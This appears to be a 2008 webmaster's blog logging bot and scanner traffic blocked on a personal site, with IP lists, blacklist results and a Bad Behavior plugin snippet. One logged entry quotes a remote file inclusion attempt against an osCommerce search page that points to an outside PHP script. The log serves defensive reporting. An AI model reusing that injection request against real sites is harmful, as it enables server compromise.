Jun 30, 2008

After banning the domain amazonaws.com because they are hosting bots.
I get all of this.

Agent: webclient
75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com
Agent: webclient
75.101.206.181 ec2-75-101-206-181.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322)
67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.31.132 ec2-67-202-31-132.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com
Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 1.1.4322; .net clr 2.0.50727)
67.202.57.15 ec2-67-202-57-15.compute-1.amazonaws.com

Agent: Mozilla/5.0 (compatible; zermelo; +http://www.powerset.com) [email:paul@page-store.com-crawl@powerset.com]
72.44.49.121 ec2-72-44-49-121.z-1.compute-1.amazonaws.com

Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.34.44 ec2-67-202-34-44.compute-1.amazonaws.com


-----Update AideRSS just does not get it that they have been blocked.
67.202.23.122 ec2-67-202-23-122.compute-1.amazonaws.com
[06-17-2008-16:07:52] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.226.160 ec2-75-101-226-160.compute-1.amazonaws.com
[06-17-2008-16:09:04] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.219.174 ec2-75-101-219-174.compute-1.amazonaws.com
[06-17-2008-16:09:19] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.21.42 ec2-67-202-21-42.compute-1.amazonaws.com
[06-17-2008-16:09:22] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.23.83 ec2-67-202-23-83.compute-1.amazonaws.com
[06-17-2008-16:09:29] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.211.7 ec2-75-101-211-7.compute-1.amazonaws.com
[06-17-2008-16:09:35] Scan Blacklist Domain Ban: amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
75.101.244.65 ec2-75-101-244-65.compute-1.amazonaws.com
Agent: AideRSS/1.0 (aiderss.com); * subscribers
67.202.61.94 ec2-67-202-61-94.compute-1.amazonaws.com


Update

67.202.31.132 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.61.94 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.23.83 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.21.42 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.23.122 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.34.44 is BLACKLISTED by dnsbl.njabl.org for spam
67.202.57.15 is BLACKLISTED by dnsbl.njabl.org for spam


The following comment is associated with this record: This network is a member of a dynamic hosting environment. See http://ec2.amazonaws.com/
It was added to the list: Tue Apr 1 12:41:39 2008 EST

spam source means the system was found via manual spam header parsing to be the origin of spam.

update july 15th
Agent: firefox/2.0.0.6 (ubuntu-feisty)
72.44.48.95 ec2-72-44-48-95.compute-1.amazonaws.com

Jun 17, 2008

openrbl.org is gone

openrbl.org is down and I need a replacement that can do a lookup on all of the block list and do a DNS lookup.

I did find a replacement of sorts. Change the admin.php $dns_lookup setting to.

$dns_lookup ="http://www.robtex.com/rbl/";


If anyone knows of one please post it.

Jun 6, 2008

Request contained a malicious JavaScript or SQL injection attack

bad-behavior is now blocking what it says is a SQL injection but all its really looking for is a # in the header. So I end up seeing crap like this.

I think this may be a bug in bad behavior

Update: I am still seeing this from the Yahoo bot

403 Request contained a malicious JavaScript or SQL injection attack
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
74.6.8.122 llf520018.crawl.yahoo.net

403 Request contained a malicious JavaScript or SQL injection attack
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
74.6.17.186 llf520164.crawl.yahoo.net

403 Request contained a malicious JavaScript or SQL injection attack www.winnfreenet.com
Agent: Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)
74.6.22.159 llf520079.crawl.yahoo.net



// Broken spambots send URLs with various invalid characters
// Some broken browsers send the #vector in the referer field :(
if (strpos($package['request_uri'], "#") !== FALSE) {
return "dfd9b1ad";
}

Jun 2, 2008

robot on pox1s.craigslist.org

Why would craigslist.org be running a bot?

403 Required header 'Accept' missing
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
66.150.243.17 pox1s.craigslist.org

Jun 1, 2008

barton.centeralnet.com bot

Agent: -NO AGENT-
216.32.80.66 barton.centeralnet.com

Some type of webhosting company in IRAN

developmentseed.org Bot 207.162.216.100 www1.developmentseed.org

Agent: python-urllib/2.4
207.162.216.100 www1.developmentseed.org

Why is developmentseed.org scanning my site using a free bot lib. ?

I dont see anything on the site about them running a bot.

hacker using email brancohat@gmail.com and script at www.1004smile.com/data/enviador.txt

Another hacker trying to inject a php script located at.
http://www.1004smile.com/data/enviador.txt

[05-31-2008-15:49:12]
advanced_search_result.php?categories_id=http://www.1004smile.com/data/enviador.txt?&servidor=www._____.com/advanced_search_result.php?categories_id=¶=brancohat@gmail.com GET HTTP/1.1
Agent: -NO AGENT-
81.171.34.37 kopkaas.com

This has something to do with the OSCOMMERCE search routine.

Lame Botnets

When you see the same lame bug in a bot comming from several IPS at the same time it must be a botnet. If you own any of these please remove the bots from your system.


[05-31-2008-12:24:55] bad-behavior 417 Header 'Expect' prohibited; resend without Expect /submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
210.138.109.72 72.109.138.210.bn.2iij.net

[05-31-2008-12:25:03] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
194.120.231.244 khe-fwcluster-ext.khe.agile.agilesoft.com

[05-31-2008-12:25:08] bad-behavior 403 Required header 'Accept' missing
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)
216.106.84.150 mx3.ntm.org

[05-31-2008-12:25:10] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
194.120.231.244 khe-fwcluster-ext.khe.agile.agilesoft.com

[05-31-2008-12:25:17] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
129.142.64.65 chef.catpipe.net

[05-31-2008-12:25:23] bad-behavior 417 Header 'Expect' prohibited; resend without Expect submit.php
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
213.134.40.89 baphealth.c.mad.interhost.com


[05-31-2008-12:26:35] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.1 (build 00975))
194.120.231.244 khe-fwcluster-ext.khe.agile.agilesoft.com

[05-31-2008-12:26:47] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
62.3.32.27

[05-31-2008-12:26:54] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)
62.3.32.27

[05-31-2008-12:27:20] bad-behavior 417 Header 'Expect' prohibited; resend without Expect
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
163.24.235.249